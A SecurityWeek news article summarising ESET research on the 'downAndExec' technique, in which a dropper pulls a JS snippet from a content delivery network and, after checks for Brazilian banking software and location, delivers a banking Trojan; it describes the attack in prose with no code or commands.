Virtual Event: Threat Detection and Incident Response Summit - Watch Sessions
Connect with us

Hi, what are you looking for?


Malware & Threats

New Attack Abuses CDNs to Spread Malware

Content delivery networks (CDNs) are being increasingly abused to spread malware, courtesy of standards that allow the download and execution of payloads on computers, ESET warns.

Content delivery networks (CDNs) are being increasingly abused to spread malware, courtesy of standards that allow the download and execution of payloads on computers, ESET warns.

The security firm analyzed the downAndExec standard, which makes extensive use of JS scripts and enables the download and execution of malware. In one attack, miscreants were observed using the standard and abusing CDNs to deliver banking threats to users in Brazil, the researchers reveal.

The attack chain starts with social engineering techniques being used to trick victims into executing a malicious application detected as NSIS/TrojanDropper.Agent.CL. This is a malware downloader designed to fetch a single snippet of externally-hosted JS necessary to supplement the execution process.

The JS snippet is hosted on the infrastructure of a CDN provider, which not only provides high bandwidth for payload delivery and command and control (C&C) operations, but also ensures that takedown attempts aren’t immediately successful, as it is impracticable to block the entire CDN domain.

Searching for indicators of compromise is also difficult in such cases, as the affected environments might have a large number of access records made by non-malicious software, the security researchers say.

After the content of said JS snippet is fetched, a function is called to add to the end of the JS snippet a string containing “downAndExec” and two parameters representing the URL where the C&C is hosted, and “x-id” data, which is necessary to download other payloads.

The researchers also discovered that in addition to obfuscation, protection against sandboxing has been implemented as well. Thus, the malicious code isn’t executed if the JS snippet is analyzed separately. Moreover, the script performs a series of checks before executing malicious functions, to make sure that the target machine is of potential interest.

Advertisement. Scroll to continue reading.

The malware checks for various files, after which it starts looking for folders associated with banking programs such as Bradesco, Itaú, Sicoob and Santander. The researchers suggest that this check is probably intended to prevent activation of malicious functions on computers that are not used for online banking.

Finally, the malware also checks whether the target computer is located in Brazil. This shows that the attack is targeted and might also be meant to avoid analysis. The snippet verifies that the customer IP is from a Brazilian AS (autonomous system).

Should the computer meet all conditions, the malware initiates communication with the C&C, which results in the final compromise being performed. In the analyzed incident, the malware downloaded three files, one of which is a banking Trojan.

“As we have seen, the downAndExec technique involves two download stages and several protections, either to identify machines matching the desired profile, or to distribute malicious code in ‘sterile’ sections, which on their own do not execute (in order to bypass online protections), but which, when joined with other pieces of malicious code, are capable of compromising a victim’s computers,” ESET concludes.

Related: Floki Bot Developer Imports Cybercrime Tools to Brazil

Related: PowerShell-Abusing Banking Trojan Goes to Brazil

Written By

Ionut Arghire is an international correspondent for SecurityWeek.

Click to comment

Daily Briefing Newsletter

Subscribe to the SecurityWeek Email Briefing to stay informed on the latest threats, trends, and technology, along with insightful columns from industry experts.

SecurityWeek’s Threat Detection and Incident Response Summit brings together security practitioners from around the world to share war stories on breaches, APT attacks and threat intelligence.


Securityweek’s CISO Forum will address issues and challenges that are top of mind for today’s security leaders and what the future looks like as chief defenders of the enterprise.


Expert Insights

Related Content


The changing nature of what we still generally call ransomware will continue through 2023, driven by three primary conditions.


A recently disclosed vBulletin vulnerability, which had a zero-day status for roughly two days last week, was exploited in a hacker attack targeting the...


No one combatting cybercrime knows everything, but everyone in the battle has some intelligence to contribute to the larger knowledge base.

Malware & Threats

Threat actors are increasingly abusing Microsoft OneNote documents to deliver malware in both targeted and spray-and-pray campaigns.

Malware & Threats

Unpatched and unprotected VMware ESXi servers worldwide have been targeted in a ransomware attack exploiting a vulnerability patched in 2021.

Malware & Threats

A vulnerability affecting IBM’s Aspera Faspex file transfer solution, tracked as CVE-2022-47986, has been exploited in attacks.


The recent ransomware attack targeting Rackspace was conducted by a cybercrime group named Play using a new exploitation method, the cloud company revealed this...

Application Security

Virtualization technology giant VMware on Tuesday shipped urgent updates to fix a trio of security problems in multiple software products, including a virtual machine...